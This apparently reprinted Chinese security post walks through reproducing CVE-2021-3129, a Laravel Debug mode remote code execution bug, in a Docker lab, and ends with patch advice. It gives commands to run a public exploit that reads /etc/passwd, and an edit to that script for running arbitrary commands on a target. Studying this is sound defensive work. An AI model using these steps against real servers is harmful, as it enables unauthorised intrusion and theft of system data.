<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    CVE-2021-3129 Laravel Debug mode 遠程代碼執行漏洞復現

    VSole2021-07-14 13:10:41

    0x00 簡介

    Laravel是一套簡潔、優雅的PHP Web開發框架(PHP Web Framework),旨在實現的Web軟件的MVC架構,它可以讓開發者從面條一樣雜亂的代碼中解脫出來,幫助構建一個完美的網絡APP,而且每行代碼都可以簡潔、富于表達力。

    在Laravel中已經具有了一套高級的PHP ActiveRecord實現 -- Eloquent ORM。它能方便的將“約束(constraints)”應用到關系的雙方,這樣開發者就具有了對數據的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Fluent中查詢構造器(query-builder)的所有方法。

    0x01 漏洞概述

    Laravel <= 8.4.2 存在遠程代碼執行漏洞,當Laravel開啟了Debug模式時,由于Laravel自帶的2.5.2之前的Ignition功能的某些接口和函數存在過濾不嚴,未經過身份驗證的遠程攻擊者可以發起惡意請求,通過構造惡意Log文件等方式觸發phar反序列化,從而造成遠程代碼執行,控制服務器。

    0x02 影響版本

    Laravel<=8.4.2
    Ignition<2.5.2
    

    0x03 環境搭建

    1.使用github已經搭建好的環境進行復現。

    gitclone git://github.com/SNCKER/CVE-2021-3129
    

    2.切換到剛剛下載的目錄,執行以下命令即可自動完成環境搭建和啟動。

    docker-compose up -d
    

    3.瀏覽器訪問 http://192.168.141.131:8888,出現如下界面。

    點擊Generate app key,發送請求,在配置文件中配置了一個加密key。

    再刷新一下界面,出現以下內容即搭建成功。

    0x04 漏洞復現

    1.github上的環境附帶exp,使用vim打開查看,其默認目標為本地,執行"cat /etc/passwd"命令

    2.在執行exp之前,需要下載phpggc工具,phpggc要和exploit.py在放同一文件夾內

    gitclone git://github.com/ambionics/phpggc.git
    

    3.執行如下代碼,即可默認查看 /etc/passwd 文件

    python3 exploit.py
    

    4.簡單修改一下 exploit.py 腳本即可執行任意命令

    Vim打開腳本,首先在exploit.py開頭import sys庫

    主函數改為如下內容(注意縮進)

    args= sys.argv
    url= args[1]
    command= args[2]
    Exp(url, command)
    

    運行如下指令,第1個參數即為目標ip,第2個參數即為想要執行的命令

    python3 exploit.py http://127.0.0.1:8888 'ifconfig'
    

    0x05 防護建議

    1.使用白名單限制相關web項目的訪問來降低風險;

    2.將 Laravel 框架升級至8.4.3及其以上版本,或者將facade ignition組件升級至 2.5.2 及其以上版本。

    漏洞
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    該公司吸引的總投資金額已超過5600萬美元,新一輪融資將主要用于加速公司在全球范圍內的擴張,并支持其從北美到歐洲不斷增長的全球客戶群,同時也將支持推進AI路線和產品技術創新。
    漏洞概述  漏洞名稱Google Chrome WebRTC 堆緩沖區溢出漏洞漏洞編號QVD-2023-48180,CVE-2023-7024公開時間2023-12-20影響量級千萬級奇安信評級高危CVSS 3.1分數8.8威脅類型代碼執行、拒絕服務利用可能性高POC狀態未公開在野利用狀態已發現EXP狀態未公開技術細節狀態未公開利用條件:需要用戶交互。01 漏洞詳情影
    漏洞分析 CVE-2010-0249
    2023-11-25 17:50:17
    漏洞分析 CVE-2010-0249
    漏洞信息共享合作單位證書近日,Coremail獲得由國家信息安全漏洞庫(CNNVD)頒發的“CNNVD漏洞信息共享合作單位”證書。 此證書是國家權威機構對Coremail安全研究技術和漏洞挖掘技術實力的充分肯定,也是雙方合作的里程碑。 國家信息安全漏洞庫(CNNVD), 為負責建設運維的國家級信息安全漏洞數據管理平臺, 旨在為我國信息安全保障提供服務。  “
    漏洞預警 CraftCMS遠程代碼執行漏洞
    漏洞排查與處置,是安全管理員在安全運營中都會碰到的問題,常見卻很難做好。
    美國聯邦調查局于近日警告稱,梭子魚電子郵件安全網關(ESG)的一個重要遠程命令注入漏洞的補丁 "無效",已打補丁的設備仍在不斷受到攻擊。
    點擊上方藍字 關注安全知識引言Fiora:漏洞PoC框架Nuclei的圖形版。快捷搜索PoC、一鍵運行Nu
    Mikrotik RouterOS操作系統不支持暴力保護,默認的“admin”用戶密碼在2021年10月之前是空字符串。更讓人震驚的是,檢測CVE-2023-30799的利用“幾乎不可能”,因為RouterOS web和Winbox接口實現了自定義加密,而威脅檢測系統Snort和Suricata無法解密和檢查這些加密。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类